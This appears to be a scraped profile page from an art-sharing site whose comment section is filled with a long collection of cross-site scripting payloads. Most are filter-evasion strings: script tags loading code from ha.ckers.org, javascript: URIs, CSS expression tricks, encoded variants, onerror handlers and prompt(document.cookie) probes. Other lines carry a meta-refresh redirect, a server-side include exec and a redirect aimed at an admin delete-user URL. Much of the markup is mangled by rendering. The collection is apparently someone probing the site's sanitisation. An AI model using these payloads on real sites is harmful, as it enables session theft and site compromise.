Avatar for hackerone-alyssa

hackerone-alyssa

hackerone-alyssa

Commissions: Closed
Trades: Closed
Requests: Closed

Profile

2"-->2"-->2"-->

Statistics

Joined 8 February 2018

185
Pageviews
0
Followers
0
Favorites Given
0
Favorites Received
4
Submissions
0
Journals
0
Following

Shouts

  • Link

    jav ascript:alert('XSS');
    perl -e 'print "java\0script:alert(\"XSS\")";' > out




    <alert(&quot;XSS&quot;);//&lt;<p><SCRIPT SRC=//ha.ckers.org/.j><br><IMG SRC="javascript:alert('XSS')"<br><iframe src=http://ha.ckers.org/scriptlet.html <<br>\";alert('XSS');//<br></TITLE><SCRIPT>alert(&quot;XSS&quot;);</p>




    <p>li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}
    • XSS
      vbscript:msgbox("XSS")
      livescript:[code]






      @import&#39;<a href="http://ha.ckers.org/xss.css">http://ha.ckers.org/xss.css</a>&#39;;</p>

      http://ha.ckers.org/xssmoz.xml#xss")}

      <p>@im\port&#39;\ja\vasc\ript:alert(&quot;XSS&quot;)&#39;;</p>


      exp/<A STYLE='no\xss:noxss("//");xss:ex/*XSS////pression(alert("XSS"))'>

      <p>alert(&#39;XSS&#39;);</p><p>.XSS{background-image:url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}
      BODY{background:url(&quot;javascript:alert(&#39;XSS&#39;)&quot;)}</p><p>BODY{background:url(&quot;javascript:alert(&#39;XSS&#39;)&quot;)}</p>



      ¼script¾alert(¢XSS¢)¼/script¾











      <!--#exec cmd="/bin/echo '<!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js>'"-->
      <? echo('alert("XSS")'); ?>
      http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode
      Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
      +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

      <p>&quot; SRC=&quot;<a href="http://ha.ckers.org/xss.js%22%3E">http://ha.ckers.org/xss.js&quot;&gt;</a></p>'" SRC="http://ha.ckers.org/xss.js"><p>` SRC=&quot;<a href="http://ha.ckers.org/xss.js%22%3E">http://ha.ckers.org/xss.js&quot;&gt;</a></p><p>document.write(&quot;<SCRI");PT SRC="http://ha.ckers.org/xss.js">

      XSS
      XSS
      XSS
      XSS
      XSS
      XSS

      {font-family&colon;&#39;<iframe/onload=confirm(1)>&#39; </p></body></html>

  • Link

    p[foo=bar{}<em>{-o-link:&#39;javascript:javascript:alert(1)&#39;}{}</em>{-o-link-source:current}]{color:red};@import "data:,%7bx:expression(javascript:alert(1))%7D";XXXXXX[{}@import'%(css)s?]X

    XXX
    XXX<// style=x:expression\28javascript:alert(1)\29><em>{x:expression(javascript:alert(1))}
    X
    X
    with(document.getElementById(&quot;d&quot;))innerHTML=innerHTML<div style="background:url(/f#oo/;color:red//foo.jpg);">X
    X
    XXX
    #x{font-family:foo[bar;color:green;} #y];color:red;{} XXX({set/<strong>/$($){_/</strong>/setter=$,<em>=javascript:alert(1)}}).$=eval({0:#0=eval/#0#/#0#(javascript:alert(1))})ReferenceError.prototype.<strong>defineGetter</strong>(&#39;name&#39;, function(){javascript:alert(1)}),xObject.<strong>noSuchMethod</strong> = Function,[{}][0].constructor.</em>(&#39;javascript:alert(1)&#39;)()&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi&alert&amp;A7&amp;(1)&amp;R&UA;&amp;&amp;&lt;&amp;A9&amp;11/script&amp;X&amp;&gt;<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`></p></body></html>
  • Link

    CLICKME

    CLICKME



    <!----><img src=x onerror=javascript:alert(1)//
    </comment><img src=x onerror=javascript:alert(1))//
    <![>]><img src=x onerror=javascript:alert(1)//
    <img src="x

  • XXX<p>javascript:alert(1)</p>




    alert(1)0

    document.getElementById(&quot;div2&quot;).innerHTML = document.getElementById(&quot;div1&quot;).innerHTML;


    javascript:alert(1)

    <p><div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x<br>&lt;? foo=&quot;&gt;<script>javascript:alert(1)">
    <! foo=">javascript:alert(1)">
    </ foo=">javascript:alert(1)">
    <? foo=">

    `><img src=x:x onerror=javascript:alert(1)></a>"></p>
<!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
<script src=


    X

  • Link

    al

    <p>$=1,alert($)</p><p>confirm(1)
    $=1,\u0061lert($)</p>

    <eval(&#39;\u&#39;+&#39;0061&#39;+&#39;lert(1)&#39;)//
    <\u0061lert(1)
    alert(1)

    String.fromCharCode(88,83,83)
    alert&#40;&#39;1&#39;&amp;#41</x><br><iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'></p></body></html>

  • Link

  • Link

    ">











  • Link

    a)
    a)
    a)\
    javascript:prompt(document.cookie)
    <&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
    a\
    a
    a
    a'"`onerror=prompt(document.cookie)\

    notmalicious
    test)
    test;com)
    notmalicious
    notmalicious
    a
    clickme)
    http://danlec@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
    http://<meta http-equiv="refresh" content="0; url=http://danlec.com/">
    text
    a)
    a
    a
    a
    a
    a
    a)
    a;com)
    a
    a
    /http://<?php><h1><script:scriptconfirm(2)